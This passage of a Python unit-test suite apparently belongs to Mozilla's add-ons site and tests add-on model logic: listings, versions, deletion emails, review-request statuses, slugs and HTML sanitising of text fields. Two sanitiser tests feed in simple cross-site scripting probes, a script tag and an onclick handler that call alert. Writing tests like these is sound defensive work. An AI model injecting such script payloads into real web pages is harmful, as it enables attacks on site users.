eq_(list(Addon.objects.top_free(amo.THUNDERBIRD, listed=False)), [])
def make_paid(self, addons, type=amo.ADDON_PREMIUM):
price = Price.objects.create(price='1.00')
for addon in addons:
addon.update(premium_type=type)
AddonPremium.objects.create(addon=addon, price=price)
def test_top_paid_public(self):
addons = list(Addon.objects.listed(amo.FIREFOX)[:3])
self.make_paid(addons)
eq_(list(Addon.objects.top_paid(amo.FIREFOX)),
sorted(addons, key=lambda x: x.weekly_downloads, reverse=True))
eq_(list(Addon.objects.top_paid(amo.THUNDERBIRD)), [])
def test_top_paid_all(self):
addons = list(Addon.objects.listed(amo.FIREFOX)[:3])
for addon in addons:
addon.update(status=amo.STATUS_LITE)
self.make_paid(addons)
eq_(list(Addon.objects.top_paid(amo.FIREFOX, listed=False)),
sorted(addons, key=lambda x: x.weekly_downloads, reverse=True))
eq_(list(Addon.objects.top_paid(amo.THUNDERBIRD, listed=False)), [])
def test_top_paid_in_app_all(self):
addons = list(Addon.objects.listed(amo.FIREFOX)[:3])
for addon in addons:
addon.update(status=amo.STATUS_LITE)
self.make_paid(addons, amo.ADDON_PREMIUM_INAPP)
eq_(list(Addon.objects.top_paid(amo.FIREFOX, listed=False)),
sorted(addons, key=lambda x: x.weekly_downloads, reverse=True))
eq_(list(Addon.objects.top_paid(amo.THUNDERBIRD, listed=False)), [])
def test_new_featured(self):
f = Addon.objects.featured(amo.FIREFOX)
eq_(f.count(), 3)
eq_(sorted(x.id for x in f),
[2464, 7661, 15679])
f = Addon.objects.featured(amo.THUNDERBIRD)
assert not f.exists()
class TestNewAddonVsWebapp(amo.tests.TestCase):
def test_addon_from_kwargs(self):
a = Addon(type=amo.ADDON_EXTENSION)
assert isinstance(a, Addon)
def test_webapp_from_kwargs(self):
w = Addon(type=amo.ADDON_WEBAPP)
assert isinstance(w, Webapp)
def test_addon_from_db(self):
a = Addon.objects.create(type=amo.ADDON_EXTENSION)
assert isinstance(a, Addon)
assert isinstance(Addon.objects.get(id=a.id), Addon)
def test_webapp_from_db(self):
a = Addon.objects.create(type=amo.ADDON_WEBAPP)
assert isinstance(a, Webapp)
assert isinstance(Addon.objects.get(id=a.id), Webapp)
class TestAddonModels(amo.tests.TestCase):
fixtures = ['base/apps',
'base/appversion',
'base/collections',
'base/featured',
'base/platforms',
'base/users',
'base/addon_5299_gcal',
'base/addon_3615',
'base/addon_3723_listed',
'base/addon_6704_grapple.json',
'base/addon_4594_a9',
'base/addon_4664_twitterbar',
'base/thunderbird',
'addons/featured',
'addons/invalid_latest_version',
'addons/blacklisted']
def setUp(self):
TranslationSequence.objects.create(id=99243)
# TODO(andym): use Mock appropriately here.
self.old_version = amo.FIREFOX.latest_version
amo.FIREFOX.latest_version = '3.6.15'
def tearDown(self):
amo.FIREFOX.latest_version = self.old_version
def test_current_version(self):
"""
Tests that we get the current (latest public) version of an addon.
"""
a = Addon.objects.get(pk=3615)
eq_(a.current_version.id, 81551)
def test_current_version_listed(self):
a = Addon.objects.get(pk=3723)
eq_(a.current_version.id, 89774)
def test_current_version_listed_no_version(self):
Addon.objects.filter(pk=3723).update(_current_version=None)
Version.objects.filter(addon=3723).delete()
a = Addon.objects.get(pk=3723)
eq_(a.current_version, None)
def test_latest_version(self):
"""
Tests that we get the latest version of an addon.
"""
a = Addon.objects.get(pk=3615)
eq_(a.latest_version.id, Version.objects.filter(addon=a).latest().id)
def test_latest_version_no_version(self):
Addon.objects.filter(pk=3723).update(_current_version=None)
Version.objects.filter(addon=3723).delete()
a = Addon.objects.get(pk=3723)
eq_(a.latest_version, None)
def test_latest_version_ignore_beta(self):
a = Addon.objects.get(pk=3615)
v1 = Version.objects.create(addon=a, version='1.0')
File.objects.create(version=v1)
eq_(a.latest_version.id, v1.id)
v2 = Version.objects.create(addon=a, version='2.0beta')
File.objects.create(version=v2, status=amo.STATUS_BETA)
v2.save()
eq_(a.latest_version.id, v1.id) # Still should be f1
def test_current_version_unsaved(self):
a = Addon()
a._current_version = Version()
eq_(a.current_version, None)
def test_latest_version_unsaved(self):
a = Addon()
a._latest_version = Version()
eq_(a.latest_version, None)
def test_current_beta_version(self):
a = Addon.objects.get(pk=5299)
eq_(a.current_beta_version.id, 50000)
def _create_new_version(self, addon, status):
av = addon.current_version.apps.all()[0]
v = Version.objects.create(addon=addon, version='99')
File.objects.create(status=status, version=v)
ApplicationsVersions.objects.create(application_id=amo.FIREFOX.id,
version=v, min=av.min, max=av.max)
return v
def test_transformer(self):
addon = Addon.objects.get(pk=3615)
# If the transformer works then we won't have any more queries.
with self.assertNumQueries(0):
addon._current_version
addon._backup_version
addon.latest_version
def _delete(self):
"""Test deleting add-ons."""
a = Addon.objects.get(pk=3615)
a.name = u'é'
a.delete('bye')
eq_(len(mail.outbox), 1)
def test_delete(self):
deleted_count = Addon.with_deleted.count()
self._delete()
eq_(deleted_count, Addon.with_deleted.count())
addon = Addon.with_deleted.get(pk=3615)
eq_(addon.status, amo.STATUS_DELETED)
eq_(addon.slug, None)
eq_(addon.current_version, None)
eq_(addon.app_slug, None)
def _delete_url(self):
"""Test deleting addon has URL in the email."""
a = Addon.objects.get(pk=4594)
url = a.get_url_path()
a.delete('bye')
assert absolutify(url) in mail.outbox[0].body
def test_delete_url(self):
count = Addon.with_deleted.count()
self._delete_url()
eq_(count, Addon.with_deleted.count())
def test_delete_reason(self):
"""Test deleting with a reason gives the reason in the mail."""
reason = u'trêason'
a = Addon.objects.get(pk=3615)
a.name = u'é'
eq_(len(mail.outbox), 0)
a.delete(msg='bye', reason=reason)
eq_(len(mail.outbox), 1)
assert reason in mail.outbox[0].body
def test_delete_status_gone_wild(self):
"""
Test deleting add-ons where the higheststatus is zero, but there's a
non-zero status.
"""
count = Addon.objects.count()
a = Addon.objects.get(pk=3615)
a.status = amo.STATUS_UNREVIEWED
a.highest_status = 0
a.delete('bye')
eq_(len(mail.outbox), 1)
eq_(count, Addon.with_deleted.count())
def test_delete_incomplete(self):
"""Test deleting incomplete add-ons."""
count = Addon.with_deleted.count()
a = Addon.objects.get(pk=3615)
a.status = 0
a.highest_status = 0
a.save()
a.delete(None)
eq_(len(mail.outbox), 0)
eq_(Addon.with_deleted.count(), count - 1)
def test_delete_searchengine(self):
"""
Test deleting searchengines (which have no guids) should not barf up
the deletion machine.
"""
a = Addon.objects.get(pk=4594)
a.delete('bye')
eq_(len(mail.outbox), 1)
def test_incompatible_latest_apps(self):
a = Addon.objects.get(pk=3615)
eq_(a.incompatible_latest_apps(), [])
av = ApplicationsVersions.objects.get(pk=47881)
av.max = AppVersion.objects.get(pk=97) # Firefox 2.0
av.save()
a = Addon.objects.get(pk=3615)
eq_(a.incompatible_latest_apps(), [amo.FIREFOX])
# Check a search engine addon.
a = Addon.objects.get(pk=4594)
eq_(a.incompatible_latest_apps(), [])
def test_incompatible_asterix(self):
av = ApplicationsVersions.objects.get(pk=47881)
av.max = AppVersion.objects.create(application_id=amo.FIREFOX.id,
version_int=version_int('5.*'),
version='5.*')
av.save()
a = Addon.objects.get(pk=3615)
eq_(a.incompatible_latest_apps(), [])
def test_icon_url(self):
"""
Test for an icon that exists.
"""
a = Addon.objects.get(pk=3615)
expected = (settings.ADDON_ICON_URL % (3, 3615, 32, 0)).rstrip('/0')
assert a.icon_url.startswith(expected)
a = Addon.objects.get(pk=3615)
a.icon_type = None
assert a.icon_url.endswith('icons/default-32.png')
a.icon_type = 'image/png'
assert a.icon_url.endswith('?modified=%s' %
int(time.mktime(a.modified.timetuple())))
a.type = amo.ADDON_WEBAPP # a is now a Webapp, with no icon_hash.
assert a.icon_url.endswith('?modified=never')
a.icon_hash = 'fakehash' # a is now a Webapp, with an icon_hash.
assert a.icon_url.endswith('?modified=fakehash')
def test_icon_url_default(self):
a = Addon.objects.get(pk=3615)
a.update(icon_type='')
default = 'icons/default-32.png'
eq_(a.icon_url.endswith(default), True)
eq_(a.get_icon_url(32).endswith(default), True)
eq_(a.get_icon_url(32, use_default=True).endswith(default), True)
eq_(a.get_icon_url(32, use_default=False), None)
def test_thumbnail_url(self):
"""
Test for the actual thumbnail URL if it should exist, or the no-preview
url.
"""
a = Addon.objects.get(pk=4664)
a.thumbnail_url.index('/previews/thumbs/20/20397.png?modified=')
a = Addon.objects.get(pk=5299)
assert a.thumbnail_url.endswith('/icons/no-preview.png'), (
'No match for %s' % a.thumbnail_url)
def test_is_unreviewed(self):
"""Test if add-on is unreviewed or not"""
# public add-on
a = Addon.objects.get(pk=3615)
assert not a.is_unreviewed(), 'public add-on: is_unreviewed=False'
# unreviewed add-on
a = Addon(status=amo.STATUS_UNREVIEWED)
assert a.is_unreviewed(), 'sandboxed add-on: is_unreviewed=True'
a.status = amo.STATUS_PENDING
assert a.is_unreviewed(), 'pending add-on: is_unreviewed=True'
def test_is_public(self):
# Public add-on.
a = Addon.objects.get(pk=3615)
assert a.is_public(), 'public add-on should not be is_pulic()'
# Public, disabled add-on.
a.disabled_by_user = True
assert not a.is_public(), (
'public, disabled add-on should not be is_public()')
# Lite add-on.
a.status = amo.STATUS_LITE
a.disabled_by_user = False
assert not a.is_public(), 'lite add-on should not be is_public()'
# Unreviewed add-on.
a.status = amo.STATUS_UNREVIEWED
assert not a.is_public(), 'unreviewed add-on should not be is_public()'
# Unreviewed, disabled add-on.
a.status = amo.STATUS_UNREVIEWED
a.disabled_by_user = True
assert not a.is_public(), (
'unreviewed, disabled add-on should not be is_public()')
def test_is_featured(self):
"""Test if an add-on is globally featured"""
a = Addon.objects.get(pk=1003)
assert a.is_featured(amo.FIREFOX, 'en-US'), (
'globally featured add-on not recognized')
def test_has_full_profile(self):
"""Test if an add-on's developer profile is complete (public)."""
addon = lambda: Addon.objects.get(pk=3615)
assert not addon().has_full_profile()
a = addon()
a.the_reason = 'some reason'
a.save()
assert not addon().has_full_profile()
a.the_future = 'some future'
a.save()
assert addon().has_full_profile()
a.the_reason = ''
a.the_future = ''
a.save()
assert not addon().has_full_profile()
def test_has_profile(self):
"""Test if an add-on's developer profile is (partially or entirely)
completed.
"""
addon = lambda: Addon.objects.get(pk=3615)
assert not addon().has_profile()
a = addon()
a.the_reason = 'some reason'
a.save()
assert addon().has_profile()
a.the_future = 'some future'
a.save()
assert addon().has_profile()
a.the_reason = ''
a.the_future = ''
a.save()
assert not addon().has_profile()
def test_has_eula(self):
addon = lambda: Addon.objects.get(pk=3615)
assert addon().has_eula
a = addon()
a.eula = ''
a.save()
assert not addon().has_eula
a.eula = 'eula'
a.save()
assert addon().has_eula
def newlines_helper(self, string_before):
addon = Addon.objects.get(pk=3615)
addon.privacy_policy = string_before
addon.save()
return addon.privacy_policy.localized_string_clean
def test_newlines_normal(self):
before = ("Paragraph one.\n"
"This should be on the very next line.\n\n"
"Should be two nl's before this line.\n\n\n"
"Should be three nl's before this line.\n\n\n\n"
"Should be four nl's before this line.")
after = before # Nothing special; this shouldn't change.
eq_(self.newlines_helper(before), after)
def test_newlines_ul(self):
before = ("<ul>\n\n"
"<li>No nl's between the ul and the li.</li>\n\n"
"<li>No nl's between li's.\n\n"
"But there should be two before this line.</li>\n\n"
"</ul>")
after = ("<ul>"
"<li>No nl's between the ul and the li.</li>"
"<li>No nl's between li's.\n\n"
"But there should be two before this line.</li>"
"</ul>")
eq_(self.newlines_helper(before), after)
def test_newlines_ul_tight(self):
before = ("There should be one nl between this and the ul.\n"
"<ul><li>test</li><li>test</li></ul>\n"
"There should be no nl's above this line.")
after = ("There should be one nl between this and the ul.\n"
"<ul><li>test</li><li>test</li></ul>"
"There should be no nl's above this line.")
eq_(self.newlines_helper(before), after)
def test_newlines_ul_loose(self):
before = ("There should be two nl's between this and the ul.\n\n"
"<ul><li>test</li><li>test</li></ul>\n\n"
"There should be one nl above this line.")
after = ("There should be two nl's between this and the ul.\n\n"
"<ul><li>test</li><li>test</li></ul>\n"
"There should be one nl above this line.")
eq_(self.newlines_helper(before), after)
def test_newlines_blockquote_tight(self):
before = ("There should be one nl below this.\n"
"<blockquote>Hi</blockquote>\n"
"There should be no nl's above this.")
after = ("There should be one nl below this.\n"
"<blockquote>Hi</blockquote>"
"There should be no nl's above this.")
eq_(self.newlines_helper(before), after)
def test_newlines_blockquote_loose(self):
before = ("There should be two nls below this.\n\n"
"<blockquote>Hi</blockquote>\n\n"
"There should be one nl above this.")
after = ("There should be two nls below this.\n\n"
"<blockquote>Hi</blockquote>\n"
"There should be one nl above this.")
eq_(self.newlines_helper(before), after)
def test_newlines_inline(self):
before = ("If we end a paragraph w/ a <b>non-block-level tag</b>\n\n"
"<b>The newlines</b> should be kept")
after = before # Should stay the same
eq_(self.newlines_helper(before), after)
def test_newlines_code_inline(self):
before = ("Code tags aren't blocks.\n\n"
"<code>alert(test);</code>\n\n"
"See?")
after = before # Should stay the same
eq_(self.newlines_helper(before), after)
def test_newlines_li_newlines(self):
before = ("<ul><li>\nxx</li></ul>")
after = ("<ul><li>xx</li></ul>")
eq_(self.newlines_helper(before), after)
before = ("<ul><li>xx\n</li></ul>")
after = ("<ul><li>xx</li></ul>")
eq_(self.newlines_helper(before), after)
before = ("<ul><li>xx\nxx</li></ul>")
after = ("<ul><li>xx\nxx</li></ul>")
eq_(self.newlines_helper(before), after)
before = ("<ul><li></li></ul>")
after = ("<ul><li></li></ul>")
eq_(self.newlines_helper(before), after)
# All together now
before = ("<ul><li>\nxx</li> <li>xx\n</li> <li>xx\nxx</li> "
"<li></li>\n</ul>")
after = ("<ul><li>xx</li> <li>xx</li> <li>xx\nxx</li> "
"<li></li></ul>")
eq_(self.newlines_helper(before), after)
def test_newlines_empty_tag(self):
before = ("This is a <b></b> test!")
after = before
eq_(self.newlines_helper(before), after)
def test_newlines_empty_tag_nested(self):
before = ("This is a <b><i></i></b> test!")
after = before
eq_(self.newlines_helper(before), after)
def test_newlines_empty_tag_block_nested(self):
b = ("Test.\n\n<blockquote><ul><li></li></ul></blockquote>\ntest.")
a = ("Test.\n\n<blockquote><ul><li></li></ul></blockquote>test.")
eq_(self.newlines_helper(b), a)
def test_newlines_empty_tag_block_nested_spaced(self):
before = ("Test.\n\n<blockquote>\n\n<ul>\n\n<li>"
"</li>\n\n</ul>\n\n</blockquote>\ntest.")
after = ("Test.\n\n<blockquote><ul><li></li></ul></blockquote>test.")
eq_(self.newlines_helper(before), after)
def test_newlines_li_newlines_inline(self):
before = ("<ul><li>\n<b>test\ntest\n\ntest</b>\n</li>"
"<li>Test <b>test</b> test.</li></ul>")
after = ("<ul><li><b>test\ntest\n\ntest</b></li>"
"<li>Test <b>test</b> test.</li></ul>")
eq_(self.newlines_helper(before), after)
def test_newlines_li_all_inline(self):
before = ("Test with <b>no newlines</b> and <code>block level "
"stuff</code> to see what happens.")
after = before # Should stay the same
eq_(self.newlines_helper(before), after)
def test_newlines_spaced_blocks(self):
before = ("<blockquote>\n\n<ul>\n\n<li>\n\ntest\n\n</li>\n\n"
"</ul>\n\n</blockquote>")
after = "<blockquote><ul><li>test</li></ul></blockquote>"
eq_(self.newlines_helper(before), after)
def test_newlines_spaced_inline(self):
before = "Line.\n\n<b>\nThis line is bold.\n</b>\n\nThis isn't."
after = before
eq_(self.newlines_helper(before), after)
def test_newlines_nested_inline(self):
before = "<b>\nThis line is bold.\n\n<i>This is also italic</i></b>"
after = before
eq_(self.newlines_helper(before), after)
def test_newlines_xss_script(self):
before = "<script>\n\nalert('test');\n</script>"
after = "<script>\n\nalert('test');\n</script>"
eq_(self.newlines_helper(before), after)
def test_newlines_xss_inline(self):
before = "<b onclick=\"alert('test');\">test</b>"
after = "<b>test</b>"
eq_(self.newlines_helper(before), after)
@patch('amo.helpers.urlresolvers.get_outgoing_url')
def test_newlines_attribute_link_doublequote(self, mock_get_outgoing_url):
mock_get_outgoing_url.return_value = 'http://google.com'
before = '<a href="http://google.com">test</a>'
parsed = self.newlines_helper(before)
eq_(parsed, '<a rel="nofollow" href="http://google.com">test</a>')
def test_newlines_attribute_singlequote(self):
before = "<abbr title='laugh out loud'>lol</abbr>"
after = '<abbr title="laugh out loud">lol</abbr>'
eq_(self.newlines_helper(before), after)
def test_newlines_attribute_doublequote(self):
before = '<abbr title="laugh out loud">lol</abbr>'
after = before
eq_(self.newlines_helper(before), after)
def test_newlines_attribute_nestedquotes_doublesingle(self):
before = '<abbr title="laugh \'out\' loud">lol</abbr>'
after = before
eq_(self.newlines_helper(before), after)
def test_newlines_attribute_nestedquotes_singledouble(self):
before = '<abbr title=\'laugh "out" loud\'>lol</abbr>'
after = before
eq_(self.newlines_helper(before), after)
def test_newlines_unclosed_b(self):
before = ("<b>test")
after = ("<b>test</b>")
eq_(self.newlines_helper(before), after)
def test_newlines_unclosed_b_wrapped(self):
before = ("This is a <b>test")
after = ("This is a <b>test</b>")
eq_(self.newlines_helper(before), after)
def test_newlines_unclosed_li(self):
before = ("<ul><li>test</ul>")
after = ("<ul><li>test</li></ul>")
eq_(self.newlines_helper(before), after)
def test_newlines_malformed_faketag(self):
before = "<madonna"
after = ""
eq_(self.newlines_helper(before), after)
def test_newlines_correct_faketag(self):
before = "<madonna>"
after = "<madonna>"
eq_(self.newlines_helper(before), after)
def test_newlines_malformed_tag(self):
before = "<strong"
after = ""
eq_(self.newlines_helper(before), after)
def test_newlines_malformed_faketag_surrounded(self):
before = "This is a <test of bleach"
after = 'This is a'
eq_(self.newlines_helper(before), after)
def test_newlines_malformed_tag_surrounded(self):
before = "This is a <strong of bleach"
after = "This is a"
eq_(self.newlines_helper(before), after)
def test_newlines_less_than(self):
before = "3 < 5"
after = "3 < 5"
eq_(self.newlines_helper(before), after)
def test_newlines_less_than_tight(self):
before = "abc 3<5 def"
after = "abc 3<5 def"
eq_(self.newlines_helper(before), after)
def test_app_numeric_slug(self):
cat = Category.objects.get(id=22)
cat.slug = 123
with self.assertRaises(ValidationError):
cat.full_clean()
def test_app_categories(self):
addon = lambda: Addon.objects.get(pk=3615)
c22 = Category.objects.get(id=22)
c22.name = 'CCC'
c22.save()
c23 = Category.objects.get(id=23)
c23.name = 'BBB'
c23.save()
c24 = Category.objects.get(id=24)
c24.name = 'AAA'
c24.save()
cats = addon().all_categories
eq_(cats, [c22, c23, c24])
for cat in cats:
eq_(cat.application.id, amo.FIREFOX.id)
cats = [c24, c23, c22]
app_cats = [(amo.FIREFOX, cats)]
eq_(addon().app_categories, app_cats)
tb = Application.objects.get(id=amo.THUNDERBIRD.id)
c = Category(application=tb, name='XXX', type=addon().type, count=1,
weight=1)
c.save()
AddonCategory.objects.create(addon=addon(), category=c)
c24.save() # Clear the app_categories cache.
app_cats += [(amo.THUNDERBIRD, [c])]
eq_(addon().app_categories, app_cats)
def test_app_categories_sunbird(self):
get_addon = lambda: Addon.objects.get(pk=3615)
addon = get_addon()
# This add-on is already associated with three Firefox categories.
cats = sorted(addon.categories.all(), key=lambda x: x.name)
eq_(addon.app_categories, [(amo.FIREFOX, cats)])
# Associate this add-on with a Sunbird category.
a = Application.objects.create(id=amo.SUNBIRD.id)
c2 = Category.objects.create(application=a, type=amo.ADDON_EXTENSION,
name='Sunny D')
AddonCategory.objects.create(addon=addon, category=c2)
# Sunbird category should be excluded.
eq_(get_addon().app_categories, [(amo.FIREFOX, cats)])
def test_review_replies(self):
"""
Make sure that developer replies are not returned as if they were
original reviews.
"""
addon = Addon.objects.get(id=3615)
u = UserProfile.objects.get(pk=999)
version = addon.current_version
new_review = Review(version=version, user=u, rating=2, body='hello',
addon=addon)
new_review.save()
new_reply = Review(version=version, user=addon.authors.all()[0],
addon=addon, reply_to=new_review,
rating=2, body='my reply')
new_reply.save()
review_list = [r.pk for r in addon.reviews]
assert new_review.pk in review_list, (
'Original review must show up in review list.')
assert new_reply.pk not in review_list, (
'Developer reply must not show up in review list.')
def test_show_beta(self):
# Addon.current_beta_version will be empty, so show_beta is False.
a = Addon(status=amo.STATUS_PUBLIC)
assert not a.show_beta
@patch('addons.models.Addon.current_beta_version')
def test_show_beta_with_beta_version(self, beta_mock):
beta_mock.return_value = object()
# Fake current_beta_version to return something truthy.
a = Addon(status=amo.STATUS_PUBLIC)
assert a.show_beta
# We have a beta version but status has to be public.
a.status = amo.STATUS_UNREVIEWED
assert not a.show_beta
def test_update_logs(self):
addon = Addon.objects.get(id=3615)
set_user(UserProfile.objects.all()[0])
addon.versions.all().delete()
entries = ActivityLog.objects.all()
eq_(entries[0].action, amo.LOG.CHANGE_STATUS.id)
def test_can_request_review_waiting_period(self):
now = datetime.now()
a = Addon.objects.create(type=1)
v = Version.objects.create(addon=a)
# The first LITE version is only 5 days old, no dice.
first_f = File.objects.create(status=amo.STATUS_LITE, version=v)
first_f.update(datestatuschanged=now - timedelta(days=5),
created=now - timedelta(days=20))
# TODO(andym): can this go in Addon.objects.create? bug 618444
a.update(status=amo.STATUS_LITE)
eq_(a.can_request_review(), ())
# Now the first LITE is > 10 days old, change can happen.
first_f.update(datestatuschanged=now - timedelta(days=11))
# Add a second file, to be sure that we test the date
# of the first created file.
second_f = File.objects.create(status=amo.STATUS_LITE, version=v)
second_f.update(datestatuschanged=now - timedelta(days=5))
eq_(a.status, amo.STATUS_LITE)
eq_(a.can_request_review(), (amo.STATUS_PUBLIC,))
def test_days_until_full_nomination(self):
# Normalize to 12am for reliable day subtraction:
now = datetime.now().date()
a = Addon.objects.create(type=1)
v = Version.objects.create(addon=a)
f = File.objects.create(status=amo.STATUS_LITE, version=v)
a.update(status=amo.STATUS_LITE)
f.update(datestatuschanged=now - timedelta(days=4))
eq_(a.days_until_full_nomination(), 6)
f.update(datestatuschanged=now - timedelta(days=1))
eq_(a.days_until_full_nomination(), 9)
f.update(datestatuschanged=now - timedelta(days=10))
eq_(a.days_until_full_nomination(), 0)
f.update(datestatuschanged=now)
eq_(a.days_until_full_nomination(), 10)
# Only calculate days from first submitted version:
f.update(datestatuschanged=now - timedelta(days=2),
created=now - timedelta(days=2))
# Ignore this one:
f2 = File.objects.create(status=amo.STATUS_LITE, version=v)
f2.update(datestatuschanged=now - timedelta(days=1),
created=now - timedelta(days=1))
eq_(a.days_until_full_nomination(), 8)
# Wrong status:
f.update(datestatuschanged=now - timedelta(days=4))
a.update(status=amo.STATUS_PUBLIC)
eq_(a.days_until_full_nomination(), 0)
def setup_files(self, status):
addon = Addon.objects.create(type=1)
version = Version.objects.create(addon=addon)
File.objects.create(status=status, version=version)
return addon, version
def test_no_change_disabled_user(self):
addon, version = self.setup_files(amo.STATUS_UNREVIEWED)
addon.update(status=amo.STATUS_PUBLIC)
addon.update(disabled_by_user=True)
version.save()
eq_(addon.status, amo.STATUS_PUBLIC)
assert addon.is_disabled
def test_no_change_disabled(self):
addon = Addon.objects.create(type=1)
version = Version.objects.create(addon=addon)
addon.update(status=amo.STATUS_DISABLED)
version.save()
eq_(addon.status, amo.STATUS_DISABLED)
assert addon.is_disabled
def test_no_change_deleted(self):
addon = Addon.objects.create(type=1)
version = Version.objects.create(addon=addon)
addon.update(status=amo.STATUS_DELETED)
version.save()
eq_(addon.status, amo.STATUS_DELETED)
assert addon.is_deleted
def test_can_alter_in_prelim(self):
addon, version = self.setup_files(amo.STATUS_LITE)
addon.update(status=amo.STATUS_LITE)
version.save()
eq_(addon.status, amo.STATUS_LITE)
def test_removing_public(self):
addon, version = self.setup_files(amo.STATUS_UNREVIEWED)
addon.update(status=amo.STATUS_PUBLIC)
version.save()
eq_(addon.status, amo.STATUS_UNREVIEWED)
def test_removing_public_with_prelim(self):
addon, version = self.setup_files(amo.STATUS_LITE)
addon.update(status=amo.STATUS_PUBLIC)
version.save()
eq_(addon.status, amo.STATUS_LITE)
def test_can_request_review_no_files(self):
addon = Addon.objects.get(pk=3615)
addon.versions.all()[0].files.all().delete()
eq_(addon.can_request_review(), ())
def test_can_request_review_rejected(self):
addon = Addon.objects.get(pk=3615)
addon.latest_version.files.update(status=amo.STATUS_DISABLED)
eq_(addon.can_request_review(), ())
def check(self, status, exp, kw={}):
addon = Addon.objects.get(pk=3615)
changes = {'status': status, 'disabled_by_user': False}
changes.update(**kw)
addon.update(**changes)
eq_(addon.can_request_review(), exp)
def test_can_request_review_null(self):
self.check(amo.STATUS_NULL, (amo.STATUS_LITE, amo.STATUS_PUBLIC))
def test_can_request_review_null_disabled(self):
self.check(amo.STATUS_NULL, (), {'disabled_by_user': True})
def test_can_request_review_unreviewed(self):
self.check(amo.STATUS_UNREVIEWED, (amo.STATUS_PUBLIC,))
def test_can_request_review_nominated(self):
self.check(amo.STATUS_NOMINATED, (amo.STATUS_LITE,))
def test_can_request_review_public(self):
self.check(amo.STATUS_PUBLIC, ())
def test_can_request_review_disabled(self):
self.check(amo.STATUS_DISABLED, ())
def test_can_request_review_deleted(self):
self.check(amo.STATUS_DELETED, ())
def test_can_request_review_lite(self):
self.check(amo.STATUS_LITE, (amo.STATUS_PUBLIC,))
def test_can_request_review_lite_and_nominated(self):
self.check(amo.STATUS_LITE_AND_NOMINATED, ())
def test_can_request_review_purgatory(self):
self.check(amo.STATUS_PURGATORY, (amo.STATUS_LITE, amo.STATUS_PUBLIC,))
def test_none_homepage(self):
# There was an odd error when a translation was set to None.
Addon.objects.create(homepage=None, type=amo.ADDON_EXTENSION)
def test_slug_isdigit(self):
a = Addon.objects.create(type=1, name='xx', slug='123')
eq_(a.slug, '123~')
a.slug = '44'
a.save()
eq_(a.slug, '44~')
def test_slug_isblacklisted(self):
# When an addon is uploaded, it doesn't use the form validation,
# so we'll just mangle the slug if its blacklisted.
a = Addon.objects.create(type=1, name='xx', slug='validate')
eq_(a.slug, 'validate~')
a.slug = 'validate'
a.save()
eq_(a.slug, 'validate~')
def delete(self):
addon = Addon.objects.get(id=3615)
eq_(len(mail.outbox), 0)
addon.delete('so long and thanks for all the fish')
eq_(len(mail.outbox), 1)
def test_delete_to(self):
self.delete()
eq_(mail.outbox[0].to, [settings.FLIGTAR])
def test_delete_by(self):
try:
user = Addon.objects.get(id=3615).authors.all()[0]
set_user(user)
self.delete()
assert 'DELETED BY: 55021' in mail.outbox[0].body
finally:
set_user(None)
def test_delete_by_unknown(self):
self.delete()
assert 'DELETED BY: Unknown' in mail.outbox[0].body
def test_view_source(self):
# view_source should default to True.
a = Addon.objects.create(type=1)
assert a.view_source
@patch('files.models.File.hide_disabled_file')
def test_admin_disabled_file_hidden(self, hide_mock):
a = Addon.objects.get(id=3615)
a.status = amo.STATUS_PUBLIC
a.save()
assert not hide_mock.called
a.status = amo.STATUS_DISABLED
a.save()
assert hide_mock.called
@patch('files.models.File.hide_disabled_file')
def test_user_disabled_file_hidden(self, hide_mock):
a = Addon.objects.get(id=3615)
a.disabled_by_user = False
a.save()
assert not hide_mock.called
a.disabled_by_user = True
a.save()
assert hide_mock.called
def test_set_nomination(self):
a = Addon.objects.get(id=3615)
a.update(status=amo.STATUS_NULL)
for s in (amo.STATUS_NOMINATED, amo.STATUS_LITE_AND_NOMINATED):
a.versions.latest().update(nomination=None)
a.update(status=s)
assert a.versions.latest().nomination
def test_new_version_inherits_nomination(self):
a = Addon.objects.get(id=3615)
ver = 10
for st in (amo.STATUS_NOMINATED, amo.STATUS_LITE_AND_NOMINATED):
a.update(status=st)
old_ver = a.versions.latest()
v = Version.objects.create(addon=a, version=str(ver))
eq_(v.nomination, old_ver.nomination)
ver += 1
def test_beta_version_does_not_inherit_nomination(self):
a = Addon.objects.get(id=3615)
a.update(status=amo.STATUS_NULL)
v = Version.objects.create(addon=a, version='1.0')
v.nomination = None
v.save()
a.update(status=amo.STATUS_NOMINATED)
File.objects.create(version=v, status=amo.STATUS_BETA,
filename='foobar.xpi')
v.version = '1.1'
v.save()
eq_(v.nomination, None)
def test_lone_version_does_not_inherit_nomination(self):
a = Addon.objects.get(id=3615)
for v in Version.objects.all():
v.delete()
v = Version.objects.create(addon=a, version='1.0')
eq_(v.nomination, None)
def test_reviwed_addon_does_not_inherit_nomination(self):
a = Addon.objects.get(id=3615)
ver = 10
for st in (amo.STATUS_PUBLIC, amo.STATUS_BETA, amo.STATUS_NULL):
a.update(status=st)
v = Version.objects.create(addon=a, version=str(ver))
eq_(v.nomination, None)
ver += 1
def test_nomination_no_version(self):
# Check that the on_change method still works if there are no versions.
a = Addon.objects.get(id=3615)
a.versions.all().delete()
a.update(status=amo.STATUS_NOMINATED)
def test_nomination_already_set(self):
addon = Addon.objects.get(id=3615)
earlier = datetime.today() - timedelta(days=2)
addon.versions.latest().update(nomination=earlier)
addon.update(status=amo.STATUS_NOMINATED)
eq_(addon.versions.latest().nomination.date(), earlier.date())
def test_category_transform(self):
addon = Addon.objects.get(id=3615)
cats = addon.categories.filter(application=amo.FIREFOX.id)
names = [c.name for c in cats]
assert addon.get_category(amo.FIREFOX.id).name in names
class TestAddonDelete(amo.tests.TestCase):
def test_cascades(self):
addon = Addon.objects.create(type=amo.ADDON_EXTENSION)
AddonCategory.objects.create(addon=addon,
category=Category.objects.create(type=amo.ADDON_EXTENSION))
AddonDeviceType.objects.create(addon=addon,
device_type=DEVICE_TYPES.keys()[0])
AddonUpsell.objects.create(free=addon, premium=addon)
AddonUser.objects.create(addon=addon,
user=UserProfile.objects.create())
AppSupport.objects.create(addon=addon,
app=Application.objects.create())
Preview.objects.create(addon=addon)
AddonPremium.objects.create(addon=addon)
AddonPaymentData.objects.create(addon=addon)
# This should not throw any FK errors if all the cascades work.
addon.delete()
class TestAddonModelsFeatured(amo.tests.TestCase):
fixtures = ['base/apps', 'base/appversion', 'base/users',
'addons/featured', 'base/addon_3615', 'base/collections',
'base/featured']
def setUp(self):
# Addon._featured keeps an in-process cache we need to clear.
if hasattr(Addon, '_featured'):
del Addon._featured
def _test_featured_random(self):
f = Addon.featured_random(amo.FIREFOX, 'en-US')
eq_(sorted(f), [1001, 1003, 2464, 3481, 7661, 15679])
